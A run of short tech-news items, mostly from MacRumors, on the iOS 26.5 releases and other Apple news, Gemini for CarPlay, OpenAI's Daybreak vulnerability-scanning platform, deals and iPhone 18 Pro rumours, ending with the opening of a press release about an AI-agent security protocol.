This article, "iOS 26.5 Features: Everything New in iOS 26.5" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
The Google Maps app for CarPlay could soon include support for Gemini, based on code that MacRumors found in the Google Maps app.


Gemini integration would allow ‌CarPlay‌ users to get detailed directions and information from Gemini. Strings in the app suggest users will be able to tell Gemini to navigate to a specific location after agreeing to new Terms of Service in the iPhone version of the Google Maps app.

The Google Maps app already supports Gemini on iPhone, but Gemini is not available for use in Google Maps on ‌CarPlay‌. Gemini in Google Maps adds an "Ask Maps" feature that can answer complex, real-world questions about locations and destinations.

On the iPhone, users can navigate to a location and then say Hey Google or tap the Gemini icon to converse with Gemini in the Google Maps app.

Apple started allowing third-party voice-based conversational apps to interface with ‌CarPlay‌ in iOS 26.4, which is likely why Google is now able to add Gemini to the Google Maps app for ‌CarPlay‌.

Gemini integration is not yet live in the Google Maps ‌CarPlay‌ app, but since the framework is in the app, it could be rolling out soon. ChatGPT, Grok, and Perplexity are already available on ‌CarPlay‌.Related Roundup: CarPlayTag: GoogleRelated Forum: HomePod, HomeKit, CarPlay, Home & Auto Technology
This article, "Google Maps for CarPlay Getting Gemini AI" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Apple purchased a small, one-person company called Patchflyer back in January, according to new acquisition disclosures provided by the European Union. Patchflyer was owned by Jonathan Ochmann, who created Color.io, a web-based color grading tool popular with photographers and filmmakers.


Apple purchased Color.io and is employing Ochmann. Last year, Ochmann announced Color.io's impending closure in November, and said that he was joining a company that will let him work at a scale he could not reach on his own. "After 10+ years of running everything alone, I've reached a point where I need to grow in ways that aren't possible as a solo builder," he wrote.

Color.io was known for an easy-to-use but powerful tool for adding film-like color and texture to images. It used a custom color engine and custom color models, and it had a rich library of tools for manipulating color. Ochmann also designed the popular VisionColor LUTs prior to creating Color.io.

Color.io went offline on December 31, 2025, with about five weeks of warning for the app's 200,000+ users. Now that Ochmann is employed at Apple, Color.io capabilities could come to Apple software in the future. Ochmann's expertise and Color.io's features would be useful for Final Cut Pro or Pixelmator Pro.

Apple also acquired PromptAI during the same timeframe, according to the EU filing, but the PromptAI purchase was already known. PromptAI was a startup focusing on computer vision, and it had an app called Seemour. The app augmented home security cameras and detected people, pets, animals, and other objects.Tag: Apple Acquisition
This article, "Apple Bought Color Grading Tool Color.io in January" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
OpenAI today launched Daybreak, an answer to Anthropic's Project Glasswing initiative and Mythos AI model. Like Glasswing, Daybreak is a cyber defense effort that will help tech companies find security vulnerabilities in their platforms.


OpenAI says Daybreak is aimed at building cyber defense into software from the start. It builds on OpenAI's April launch of GPT-5.4-Cyber, which the company says has contributed to fixing more than 3,000 vulnerabilities.

OpenAI CEO Sam Altman said OpenAI would like to work with "as many companies as possible" to help them continuously secure their software against cyber threats. Several companies have already adopted Anthropic's competing Glasswing program, including Apple, Microsoft, Google, and Amazon.

Daybreak uses Codex Security to build an editable threat model from a company's software repository, then it automates monitoring for higher-risk vulnerabilities. Issues that are found can be investigated in an isolated environment.

Companies can request a Daybreak assessment from OpenAI, which includes a vulnerability scan. Pricing is not listed.

There are three models available. GPT-5.5 has standard safeguards for general purpose use, while GPT-5.5 with Trusted Access for Cyber is meant for verified defensive work in authorized environments. GPT-5.5-Cyber is for specialized authorized workflows, and it features stronger verification and account-level controls.

OpenAI is working with industry and government partners ahead of deploying more cyber-capable models in the future.Tag: OpenAI
This article, "OpenAI's New Daybreak Platform Uses GPT-5.5 to Find Software Vulnerabilities" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
iOS 26.5 introduces several interoperability changes for third-party wearables, which means European iPhone users have access to new capabilities when using non-Apple accessories.


To comply with the EU's Digital Markets Act, Apple is letting third-party wearables access some features that have historically been limited to the Apple Watch and AirPods.

Proximity pairing - Third-party earbuds are able to use proximity pairing to connect to an iPhone, similar to the AirPods. Bringing a set of earbuds that support the feature near an iPhone will initiate an AirPods-like one-tap pairing process, so third-party wearables like earbuds will no longer require multiple steps to pair.
iPhone notifications - Third-party accessories like smartwatches are able to receive notifications from the iPhone, and users are able to view and react to them. Interactive notifications from the iPhone have been limited to the Apple Watch, while third-party wearables have only been able to display read-only notifications. Notifications can only be forwarded to a single connected device at a time, so turning on notifications for a third-party wearable disables notifications on Apple Watch.
Live Activities - Live Activities from the iPhone can be displayed on a third-party wearable, similar to how Live Activities are shown on an Apple Watch.

Accessory makers will need to add support for the interoperability updates, so they may not be available right away. Third-party TVs, smartwatches, and headphones will be able to use the features.

Apple has been testing the interoperability changes in betas for the last several months, starting with iOS 26.3, but they're available for all EU users with the launch of iOS 26.5.

Apple updated its Developer Program License Agreement to reflect the EU changes. Forwarded notifications and Live Activities cannot be used for advertising, profiling, training models, or monitoring location. Forwarded information can't be sent to any other app or device besides the authorized target accessory, nor can it be modified in a way that "materially changes the meaning."

Expanded support for third-party wearables is limited to iPhone users in the European Union with an Apple account set to an EU country or region.

Apple has warned that the Digital Markets Act (DMA) is forcing it to make "concerning changes" to its products and services in the EU, and exposing customers to new risks while also disrupting the way that Apple products work together. In September, Apple urged European regulators to scrap the DMA, and in November, it shared a study it commissioned that found the DMA has not resulted in lower prices for consumers.Related Roundups: AirPods 4, iOS 26, iPadOS 26Tag: European UnionBuyer's Guide: AirPods (Neutral)Related Forums: AirPods, iOS 26
This article, "EU iPhone Users Get AirPods-Like Pairing and Notification Forwarding for Third-Party Wearables in iOS 26.5" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
The iOS 26.5 and iPadOS 26.5 updates Apple released today address more than 50 security vulnerabilities, which means it's worth updating soon if you haven't done so already.


Apple's security support document outlines all of the security updates included in the new software. There were no known actively exploited bugs, but Apple's documentation does potentially give malicious entities insight into bugs that can be exploited on devices that have not yet been updated.

There are multiple image vulnerabilities, kernel issues, and bugs related to Shortcuts, Spotlight, and screenshots. Ten WebKit vulnerabilities that could allow access to sensitive data or cause crashing were fixed.

Other updates Apple released today also include multiple security fixes. For iPhone and iPad users unable to install iOS 26, Apple released iOS 18.7.9, iPadOS 18.7.9, iPadOS 17.7.11, iOS 16.7.16, iPadOS 16.7.16, iOS 15.8.8, and iPadOS 15.8.8.

There are almost 70 security updates in macOS Tahoe 26.5, so it's also a good idea to update your Mac software. Apple released macOS Sonoma 14.8.7 and macOS Sequoia 15.7.7 for those who are unable to run ‌macOS Tahoe‌.Related Roundups: iOS 26, iPadOS 26Related Forum: iOS 26
This article, "Apple's iOS 26.5 Update Patches More Than 50 Security Flaws" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Checkmarx has confirmed that a modified version of the Jenkins AST plugin was published to the Jenkins Marketplace. "If you are using Checkmarx Jenkins AST plugin, you need to ensure that you are using the version 2.0.13-829.vc72453fa_1c16 that was published on December 17, 2025 or previously," the cybersecurity company said in a statement over the weekend. As of writing, Checkmarx has releasedView the full article
Amazon still has all-time low prices on the Apple Watch Series 11 this week, with up to $130 off numerous models of the smartwatch. This sale includes nearly every aluminum GPS model of the Series 11 on sale at a record low price, plus new steep markdowns on cellular models.

Note: MacRumors is an affiliate partner with Amazon. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.

You can get the 42mm GPS Apple Watch Series 11 for $299.00, down from $399.00, and the 46mm GPS model for $329.00, down from $429.00. On Amazon, you'll find three of the 42mm GPS and four of the 46mm GPS models on sale at these all-time low prices.

$100 OFFApple Watch Series 11 (42mm GPS) for $299.00
$100 OFFApple Watch Series 11 (46mm GPS) for $329.00

A new highlight of Series 11 deals is on the 46mm cellular model, which has hit $399.00, down from $529.00. This is a big $130 discount on the cellular Apple Watch, and it's available in three colors. You'll also find $100 off the 42mm cellular model right now.

$100 OFFApple Watch Series 11 (42mm Cell) for $399.00
$130 OFFApple Watch Series 11 (46mm Cell) for $399.00

Head to our full Deals Roundup to get caught up with all of the latest deals and discounts that we've been tracking over the past week.



Deals Newsletter

Interested in hearing more about the best deals you can find in 2026? Sign up for our Deals Newsletter and we'll keep you updated so you don't miss the biggest deals of the season!




Related Roundup: Apple Deals
This article, "Amazon Takes Up to $130 Off Apple Watch Series 11" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Apple today updated its Apple Developer app, introducing a Liquid Glass redesign and giving developers some WWDC-themed stickers that can be used in the Messages app.


The Apple Developer app has a revamped Liquid Glass icon that reintroduces some older design elements while adopting the translucent Liquid Glass aesthetic. The icon has a pencil, paintbrush, and ruler that form the "A" shape, which is a departure from the prior version with a more generic design.


There are also Liquid Glass design elements in the app, with Apple adopting a translucent navigation bar with a Liquid Glass slider, and a separate search button.

The stickers include a 50th anniversary design, a skull with an Apple eyepatch, a juice box, California poppies, and holographic-style hello and WWDC 26 options. The stickers are all animated.










Apple says the app also includes list filtering by Unwatched, Bookmarked, and Downloaded, along with preferred topics. Image capture during enrollment has also been improved.

The Apple Developer app is available to download for free. Ahead of WWDC 2026, it will be updated with new session information and an option to watch the keynote event on June 8.Related Roundup: WWDC 2026Tags: Apple Developer Program, DeveloperRelated Forum: Apple, Inc and Tech Industry
This article, "Apple Developer App Gets Liquid Glass Makeover and New WWDC 2026 Stickers" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
End-to-end encryption (E2EE) for RCS messages between iPhone and Android devices is officially available, Apple confirmed today. Support is included in iOS 26.5, which is now available to everyone.


End-to-end encrypted ‌RCS‌ messaging is available in a beta capacity, even though it is in the launch version of iOS 26.5. The feature is available with supported carriers and will roll out over time, and for conversations to be encrypted, both the receiver and the sender must use a carrier that supports the latest version of ‌RCS‌.

Apple says that it worked with Google to lead a cross-industry effort to add E2EE to ‌RCS‌. iOS users will need iOS 26.5, while Android users will need the latest version of Google Messages.

End-to-end encryption is on by default, and there is a toggle for it in the Messages section of the Settings app. Encrypted messages are denoted with a small lock symbol.

E2EE means that messages sent between devices cannot be intercepted and read by a third party. On iPhones not running iOS 26.5, ‌RCS‌ messages between iPhone and Android users do not have E2EE, but the new update will put Android to iPhone conversations on par with iPhone to iPhone conversations that are encrypted through iMessage.

Along with Google, Apple worked with the GSM Association to implement E2EE for ‌RCS‌ messages. E2EE is part of the ‌RCS‌ Universal Profile 3.0, published with Apple's help and built on the Messaging Layer Security protocol. ‌‌RCS‌‌ Universal Profile 3.0 also includes editing and deleting messages, cross-platform Tapback support, and replying to specific messages inline during cross-platform conversations.Related Roundups: iOS 26, iPadOS 26Tags: Android, RCSRelated Forum: iOS 26
This article, "iPhone-Android RCS Conversations Are End-to-End Encrypted in iOS 26.5" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Apple today released iOS 26.5 and iPadOS 26.5, the newest updates to the iOS 26 and iPadOS 26 operating systems. The software comes nearly two months after Apple released iOS 26.4 and iPadOS 26.4.


The new software can be downloaded on eligible iPhones and iPads over-the-air by going to Settings > General > Software Update. Apple has also released iOS 15.8.8, iOS 16.7.16, iOS 18.7.9, and iPadOS 17.7.11 for older devices unable to run ‌iOS 26‌ and ‌iPadOS 26‌.

iOS 26.5 introduces end-to-end encryption for RCS messages exchanged between iPhone and Android users. E2EE for ‌RCS‌ requires both participants in the conversation to have a carrier that supports the feature, and carriers will be rolling out support over time. Encrypted ‌RCS‌ messages have a small lock symbol, and match the end-to-end encryption protections of iMessage.

In the Maps app, there is a new "Suggested Places" section that displays recommendations based on location and recent searches. The Maps app is getting ads this summer, and the groundwork for ads is included in iOS 26.5 and iPadOS 26.5.

Apple added a new Pride Luminance wallpaper that matches the Pride Luminance Apple Watch face and Apple Watch band. The updates are largely the same on iPad.

Apple's release notes for the update are below.iOS 26.5 and iPadOS 26.5 may be some of the last updates that we get with new features. Apple is shifting its focus to iOS 27 and iPadOS 27, new updates that will be previewed at WWDC next month.Related Roundups: iOS 26, iPadOS 26Tag: RCSRelated Forum: iOS 26
This article, "Apple Releases iOS 26.5 and iPadOS 26.5 With End-to-End Encrypted RCS, New Wallpaper, and Maps Updates" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Apple today released macOS Tahoe 26.5, the fifth major update to the ‌macOS Tahoe‌ operating system. ‌macOS Tahoe‌ 26.5 comes seven weeks after Apple released macOS Tahoe 26.4.


Mac users can download the new software by opening up the System Settings app and navigating to the Software Update section.

‌macOS Tahoe‌ 26.5 adds a Suggested Places section to the search interface in the Apple Maps app. It also lays the groundwork for ads in the Maps app, which are coming this summer.

The App Store is also getting a monthly subscription option that will let users pay a lower price on a monthly basis, but agree to pay for a subscription for a 12-month period.

The update also likely includes several bug fixes and other under-the-hood performance updates, but no new features were found during the beta testing period.Related Roundup: macOS TahoeRelated Forum: macOS Tahoe
This article, "macOS Tahoe 26.5 Now Available" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Apple today released watchOS 26.5, the fifth major update to the watchOS 26 operating system that came out in September. watchOS 26.5 comes a month and a half after Apple released watchOS 26.4.


watchOS 26.5 can be downloaded for free on an iPhone running iOS 26.5 by opening up the Apple Watch app and going to General > Software Update, or initiating an update in the Settings app on the watch. To install the new software, the Apple Watch needs to have at least 50 percent battery and it needs to be placed on a charger.


watchOS 26.5 adds a new Pride Luminance watch face. It also fixes a bug with dual SIM iPhones and an issue that could cause audio alerts to fail to play in the Workout app. Apple's release notes for the update are below.

More on the features in ‌watchOS 26‌ can be found in our watchOS 26 roundup.Related Roundup: watchOS 26Related Forum: Apple Watch
This article, "Apple Releases watchOS 26.5 With New Pride Luminance Watch Face" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Apple today released tvOS 26.5, the fifth update to the tvOS operating system that came out last fall. tvOS 26.5 is available for the Apple TV 4K, and it comes over a month after Apple released tvOS 26.4.


tvOS 26.5 can be downloaded using the Settings app on the ‌‌‌Apple TV‌‌‌. Open up Settings and go to System > Software Update to get the new software. ‌‌‌Apple TV‌‌‌ owners who have automatic software updates activated will be upgraded to tvOS 26.5 automatically.

No new features were found in tvOS 26.5 during the beta testing period, so it likely focuses on bug fixes and performance improvements. Apple shares tvOS release notes on its website.Related Roundup: Apple TVBuyer's Guide: Apple TV (Don't Buy)Related Forum: Apple TV and Home Theater
This article, "Apple Releases tvOS 26.5" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Apple today released visionOS 26.5, the fifth update to the visionOS 26 operating system that launched in September. visionOS 26.5 comes close to two months after Apple released visionOS 26.4.


‌visionOS 26‌.5 can be downloaded on all Vision Pro headsets by navigating to the Settings app, selecting the General section, and choosing the Software Update option. To install an update, the Vision Pro headset needs to be removed, and there is a software progress bar available on the exterior EyeSight display.

Apple's release notes say that visionOS 26.5 includes bug fixes and security improvements.

visionOS 26.5 is recommended for all Vision Pro users.
Related Roundup: Apple Vision ProBuyer's Guide: Vision Pro (Buy Now)Related Forum: Apple Vision Pro
This article, "Apple Releases visionOS 26.5" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Alongside iOS 26.5, iPadOS 26.5, and macOS Tahoe 26.5, Apple has released new HomePod 26.5 software for the ‌HomePod‌ and the HomePod mini. The update comes a little over a month after Apple released ‌HomePod‌ Software 26.4.


According to Apple's release notes, ‌HomePod‌ Software 26.5 includes performance and stability improvements.

‌‌HomePod‌‌‌‌‌‌‌‌ software is installed automatically on the ‌‌‌‌‌‌‌‌HomePod‌‌‌‌ unless the feature is disabled‌‌‌‌, but the ‌‌‌‌‌‌‌‌HomePod‌‌‌‌‌‌‌‌ can also be manually updated in the Home app on iPhone, iPad, or Mac by tapping on the More button, choosing Home Settings, and then selecting the Software Update option.Related Roundups: HomePod, HomePod miniBuyer's Guide: HomePod (Caution), HomePod Mini (Don't Buy)Related Forum: HomePod, HomeKit, CarPlay, Home & Auto Technology
This article, "Apple Releases HomePod Software 26.5" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Nominations are now open for the 2026 CSO30 Australia Awards, celebrating the country’s most effective and influential cybersecurity leaders.
The CSO30 Awards will once again be held alongside the CIO50 Awards, bringing together Australia’s leading technology and security executives for a flagship industry event on 22 September in Sydney.
Part of Foundry’s prestigious global awards program, the CSO30 recognises senior cybersecurity professionals who are driving innovation, strengthening organisational resilience, and shaping the future of security across industries.
In 2026, nominees will be assessed across two core pillars: business value and leadership. Judges will evaluate cybersecurity initiatives delivered over the past two years that have improved organisational security, resilience, and operational performance, alongside each nominee’s leadership, influence, and contribution to the broader cybersecurity community.
The program will also recognise emerging talent through the Next CISO Award, spotlighting a rising cybersecurity leader demonstrating exceptional promise, impact, and leadership potential.
The CSO30 Australia Awards are open to senior cybersecurity leaders responsible for defining and executing security strategy within an Australian organisation.
All submissions must be submitted online and will be reviewed confidentially by an independent panel of experienced judges and industry experts.
Entries close on 26 June 2026.
View the full article
We're only four months out from the launch of Apple's premium next-generation smartphone lineup, and while we're not expecting a sea change in terms of functionality, there are still several enhancements rumored to be coming to the iPhone 18 Pro and iPhone 18 Pro Max.


One thing worth noting is that Apple is reportedly planning a major change to its iPhone release cycle this year, adopting a two-phase rollout starting with the iPhone 18 series. That means the iPhone 18 Pro, iPhone 18 Pro Max, and the long-rumored foldable iPhone ("iPhone Ultra") will be released in September 2026, followed by the iPhone 18 and iPhone 18e in spring 2027.


Overall Design

iPhone 17 Pro Style

Rumors suggest the iPhone 18 Pro lineup will largely retain the same design as the iPhone 17 Pro models. Most rumors suggest the rear camera system will look identical to the current generation, featuring a raised "plateau" with three lenses arranged in a triangle – although recent dummies indicate a possible thickening of the plateau and the protrusion of individual lenses. Display sizes are also expected to remain unchanged, with the iPhone 18 Pro and iPhone 18 Pro Max continuing to use 6.3-inch and 6.9-inch panels, respectively (the same dimensions introduced with the iPhone 16 Pro series). iPhone 18 Pro models could drop the current two-tone look of the rear casing found on the iPhone 17 Pro in favor of a more seamless aesthetic, while Apple has apparently updated the back-glass "replacement process" to minimize the color difference between the Ceramic Shield 2 glass and the aluminum frame, resulting in a more unified appearance.

Next-Level Battery Life

Thicker Chassis

The iPhone 18 Pro Max will feature a bigger battery for continued best-in-class battery life, claims a Chinese leaker. The Weibo user known as "Digital Chat Station" said that the ‌iPhone 18‌ Pro Max will have a battery capacity of 5,100 to 5,200 mAh. (The iPhone 17 Pro Max has the biggest ‌iPhone‌ battery to date at 5,088 mAh. Apple says it has a battery life of up to 39 hours.) According to another rumor, the body of the iPhone 18 Pro Max will be slightly thicker than the iPhone 17 Pro Max, raising the device's weight to around 243 grams. That would make the iPhone 18 Pro Max approximately 3 grams more than the iPhone 14 Pro Max, which is currently the heaviest model Apple has produced. A larger battery is the most likely cause.

Smaller Dynamic Island

Under-Screen Face ID?

Rumors continue to circulate about whether the iPhone 18 Pro models will introduce under-display Face ID, but reports remain divided on when the technology will actually arrive. The feature would move the TrueDepth camera system beneath the display, eliminating the need for the current Dynamic Island cutout.

According to Wayne Ma of The Information, Apple is targeting a design without a Dynamic Island, replacing it with a single pinhole camera in the upper-left corner of the screen. However, other sources dispute that claim. Display analyst Ross Young believes under-display Face ID is possible for the iPhone 18 Pro, but says a smaller Dynamic Island will still be present. Bloomberg's Mark Gurman has echoed this view, reporting that the new models will feature a slimmed-down Dynamic Island rather than removing it entirely. Apple is also said to be testing new camera miniaturization technology to reduce the size of the front-facing camera currently located within the Dynamic Island.

The Weibo leaker "Ice Universe" has claimed the Dynamic Island cutout on the iPhone 18 Pro models will be approximately 35% narrower than it is on the iPhone 17 Pro models. Specifically, they said it will have a width of around 13.5mm, down from around 20.7mm.

Meanwhile, Chinese leaker Instant Digital has offered yet another version of events, saying the Dynamic Island will shrink in size, but that under-display Face ID and camera technology won't debut this year. The latest word on the subject is that Apple is weighing two options for the iPhone 18 Pro's Dynamic Island, and a final decision has yet to be made. One option apparently retains the existing screen mold from the iPhone 17 Pro, while the other introduces a significantly smaller "Mini ‌Dynamic Island‌" enabled by moving the Face ID receiver and transmitter components beneath the display.

Upgraded Display

LTPO+

The iPhone 18 Pro models will reportedly use LTPO+ display technology, which should be more power efficient than the current LTPO technology in the iPhone 17 series. Such an upgrade could also contribute to longer battery life (see above), since LPTO+ enables finer control of OLED light emission, potentially allowing the display to optimize its operation based on environmental conditions. In other words, it will know better when to up screen brightness or reduce it, depending on surrounding light sources. The panels are reportedly being supplied by Samsung Display and LG Display.

A20 Pro Chip

2nm Process

The iPhone 18 Pro models will use Apple's A20 chip, based on TSMC's 2nm process for power and efficiency improvements. A move to 2nm fabrication increases transistor density, which will enable higher performance. The A20 series is expected to deliver roughly a 15 percent speed gain and about 30 percent better efficiency compared with the A19 series used in Apple's iPhone 17 models.

Apple's A20 chip will be packaged with TSMC's Wafer-Level Multi-Chip Module (WMCM) technology, suggesting at least some A20 chips will have RAM integrated directly onto the same wafer as the CPU, GPU, and Neural Engine, rather than sitting adjacent to the chip and connected via a silicon interposer. This could contribute to faster performance for both overall tasks and Apple Intelligence, and longer battery life from improved power efficiency.

C2 Modem

Replacing Qualcomm

Apple plans to include its next-generation C2 modem in the iPhone 18 Pro models, according to supply chain analyst Jeff Pu. The chip will succeed the C1 modem, which debuted in the lower-cost iPhone 16e as Apple's first in-house cellular modem, and the C1X modem chip in the iPhone Air, which Apple says is up to 2× faster than the C1. The C2 is expected to bring faster speeds, improved power efficiency, and support for mmWave 5G in the United States – a feature missing from the C1 and C1X.

Apple's modem roadmap is part of a long-term strategy to reduce reliance on Qualcomm, which currently supplies 5G modems for the rest of the iPhone lineup. The company has been working on developing its own cellular chips for years, aiming for deeper integration and greater control over power management and performance.

New Camera Sensor

Samsung-Made

Samsung is working on a new three-layer stacked image sensor, reportedly intended for the iPhone 18. The sensor, referred to as PD-TR-Logic, integrates three layers of circuitry, which would improve camera responsiveness, reduce noise, and increase dynamic range. The leak comes from a source known as "Jukanlosreve," who claims the sensor is being developed specifically for Apple's 2026 iPhone lineup. Sony has long been Apple's sole image sensor supplier, so Samsung's entry would be a big shift in the iPhone's camera supply chain.

Variable Aperture

DSLR-Style

Apple intends to equip this year's iPhone 18 Pro models with a variable aperture lens, according to reports. Weibo-based leaker Digital Chat Station claims the main rear camera – what Apple calls the 48-megapixel Fusion camera – on both iPhone 18 Pro models will offer variable aperture, which would be a first for the iPhone. A variable-aperture system physically adjusts the lens opening, letting more light in for low-light shots or narrowing the opening for brighter scenes and deeper depth of field.

The main cameras on the iPhone 15 Pro, 16 Pro, and 17 Pro all use a fixed ƒ/1.78 aperture, where the lens is permanently set to its widest setting. With a variable lens, the iPhone 18 Pro would allow users to manually shift the aperture, similar to on a DSLR camera. This would mean more control over depth of field, enabling sharper focus on subjects or smoother background blur. Industry analyst Ming-Chi Kuo said in November 2024 that Apple's iPhone 18 Pro models will get the feature.

5G Satellite Internet

Non-Terrestrial Data

According to a report by The Information, Apple plans to add support for 5G networks that operate via satellites rather than Earth-based towers as early as next year. This advancement would allow future iPhones to gain full internet connectivity through satellite, not just limited emergency features.

If Apple meets the 2026 target, the first devices to feature 5G satellite internet would likely be the iPhone 18 Pro, iPhone 18 Pro Max, and the long-rumored foldable iPhone. Apple partners with Globalstar for its iPhone satellite features, but there is currently no service that delivers full 5G satellite internet directly to a smartphone. That said, Amazon and Globalstar announced in April a definitive merger agreement under which Amazon will acquire the satellite operator. Amazon's Leo satellite network will power existing iPhone features – with scope for additional feature support as part of a forthcoming infrastructure upgrade.

Simplified Camera Control

New Design

Apple is reportedly working to simplify the Camera Control button's design on iPhone 18 models in order to reduce costs. The current Camera Control button on iPhone 17 models uses both capacitive and pressure sensors beneath a sapphire crystal surface. The capacitive layer detects touch gestures, while the force sensor recognizes different pressure levels for taps, presses, and swipes.

However, according to the Weibo-based account Instant Digital, Apple will remove the capacitive sensing layer and retain only pressure sensing recognition in the second iteration to achieve all Camera Control functions on the iPhone 18. The simplified version is not about reducing functionality in the button, but about saving money. The current solution is said to be very expensive for Apple and is generating costly after-sales repairs.

We don't expect Camera Control to go away anytime soon – Apple apparently sees it as a key feature, so much so that it has reportedly made deliberate engineering compromises to ensure that the first foldable iPhone features the button.

New Colors

Three in Testing

In February 2026, Bloomberg's Mark Gurman reported that Apple is testing a deep red finish for the iPhone 18 Pro and iPhone 18 Pro Max. Rumors of purple and brown finishes have also circulated, but Gurman believes those are just variants of the same red idea. Since then, we've seen aligned rumors that the devices will come in light blue, dark cherry, dark gray, and silver.

The iPhone 14 Pro and iPhone 14 Pro Max were previously available in Deep Purple, and Apple has never released an iPhone in a genuinely brown color. According to a Chinese leaker, Apple's iPhone 18 Pro models won't come in black this year. If the rumor is true, it will be the second consecutive year Apple has ditched what was arguably its most classic color option for the Pro lineup.Related Roundup: iPhone 18 Pro
This article, "11 Reasons to Wait for the iPhone 18 Pro" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Apple's first foldable iPhone, expected to be called the "iPhone Ultra," is shaping up to launch with a noticeably restrained selection of colors, according to multiple leakers, with sources pointing to as few as two options and a deliberate avoidance of bold or vibrant finishes for the device.


In February, the Weibo leaker known as "Instant Digital" shared a broader account of the foldable iPhone's design, describing it with just two color options, with white as the only "confirmed" shade at the time. The leaker did not reveal the second option. Instant Digital revisited their February report earlier this month without walking back any color details, keeping the two-option account intact.

More recently, Macworld cited a supply chain source to provide new details about the foldable's color options: a classic silver and white model, and an indigo option described as similar to the iPhone 17 Pro's Deep Blue finish. The same source said the device will offer fewer choices than the iPhone 18 Pro models, with no bold or vibrant colors.

The approach is reminiscent of the iPhone X, which similarly launched in just two colors, Silver and Space Gray, when it debuted in November 2017 at a then record starting price of $999. Like the foldable iPhone, the iPhone X was a generational leap that introduced an entirely new design language. The iPhone XS that followed a year later added Gold to the lineup, suggesting Apple may take the same approach with the ‌iPhone Ultra‌ over time.

A limited color offering may also be a practical consequence of the device's constrained production outlook. Supply chain analyst Ming-Chi Kuo warned that early-stage yield and ramp-up challenges could mean smooth shipments may not occur until 2027, with potential shortages lasting through at least the end of 2026. Kuo also clarified that the frequently cited order figure of 15 to 20 million foldable iPhones likely reflects cumulative demand across the product's full two to three year lifecycle, rather than 2026 alone, suggesting that annual volumes will be modest.

Developing and manufacturing each additional color variant adds complexity and cost to an already challenging production process, as well as additional SKUs to stock. With the device expected to be in short supply at launch regardless, there is little commercial incentive for Apple to broaden the initial color palette. At a starting price that Bloomberg's Mark Gurman says will "cross the $2,000 threshold," the ‌iPhone Ultra‌ is also unlikely to attract the kind of buyer who might be swayed by a wider color range, making the calculation even simpler.

The ‌iPhone Ultra‌ is expected to be announced in September 2026 alongside the ‌iPhone 18 Pro‌ and ‌iPhone 18 Pro‌ Max.Related Roundup: iPhone FoldTag: Foldable iPhone
This article, "Foldable iPhone 'Ultra' Rumored to Launch in Just Two Colors" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Apple today shared a new ad that promotes MacBooks as the "best choice for college."


In the 90-second video, students are frustrated by but eventually overcome creative block while working on assignments like screenplays and CADs.

"Mac laptops are your best choice for college," says Apple. "Whether you're studying business, engineering, design, or the arts — get started on Mac."

The ad is set to the song "I'VE GOT THIS ALL UNDER CONTROL" by Willow Kayne.

With the MacBook Neo, the Mac is more affordable than ever. In the U.S., the laptop starts at just $499 for college students who verify their enrollment.

Students can learn more about the Mac on Apple's College Students page.Tag: Apple Ads
This article, "Apple Says Mac is 'Best Choice for College' in New Ad Aimed at Students" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
B&H Photo has introduced a handful of notable MacBook Pro and MacBook Air discounts this week, all of which beat the current Amazon discounts on these notebooks. B&H Photo is a trusted authorized Apple reseller that sometimes offers great deals on brand new Apple products.

Note: MacRumors is an affiliate partner with B&H Photo. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.

MacBook Pro

B&H Photo's deal of the day is the 48GB RAM/1TB SSD 16-inch M5 Pro MacBook Pro, available for $2,699.00, down from $3,099.00. This beats the current sale price on Amazon by $200, and represents a new all-time low price on this model.

$400 OFF16-Inch MacBook Pro (48GB RAM/1TB SSD) for $2,699.00

This sale is part of B&H Photo's daily Deal Zone event, and will disappear later tonight. The discount has been applied automatically and does not require any coupon codes to see the final sale price.

MacBook Air

If you're shopping for the new M5 MacBook Air, B&H Photo is offering a few coupon discounts on the 13-inch and 15-inch models this week. This includes up to $30 in extra coupon savings once you add the notebook to your cart, stacking on the existing $150 discounts on each computer.

13-inch MacBook Air (24GB/1TB) - $1,349.00, down from $1,499.00 ($20 coupon in cart)
15-inch MacBook Air (512GB) - $1,149.00, down from $1,299.00 ($20 coupon in cart)
15-inch MacBook Air (16GB/1TB) - $1,349.00, down from $1,499.00 ($20 coupon in cart)
15-inch MacBook Air (24GB/1TB) - $1,549.00, down from $1,699.00 ($30 coupon in cart)

If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week.



Deals Newsletter

Interested in hearing more about the best deals you can find in 2026? Sign up for our Deals Newsletter and we'll keep you updated so you don't miss the biggest deals of the season!




Related Roundup: Apple Deals
This article, "B&H Introduces New Low Prices On 2026 MacBook Pro and MacBook Air" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Dubai-founded OTT Cybersecurity LLC also unveils the Agent Trust Protocol (ATP), the first open cryptographic standard for AI agent identity, scope, and action verification — slated for IETF submission.
OTT Cybersecurity LLC, the company behind Lyrie.ai, today announced two milestones that together position the company as foundational infrastructure for the agentic AI era: acceptance into Anthropic’s Cyber Verification Program (CVP), and the public release of the Agent Trust Protocol (ATP), an open cryptographic standard for securing AI agents operating autonomously on the internet.
“Being among the first companies accepted into Anthropic’s Cyber Verification Program validates what we’ve built. Lyrie isn’t a security tool that sits alongside AI. It’s the security layer that AI runs on top of.” — Guy Sheetrit, CEO and Founder of OTT Cybersecurity LLC, the company behind Lyrie.ai
A New Layer of Security for Autonomous AI Agents
Enterprises and governments are deploying autonomous AI agents at unprecedented speed — agents that read mail, write code, move money, sign contracts, and act on behalf of human operators. The security model for those agents has not existed at enterprise scale. Lyrie was built to change that.
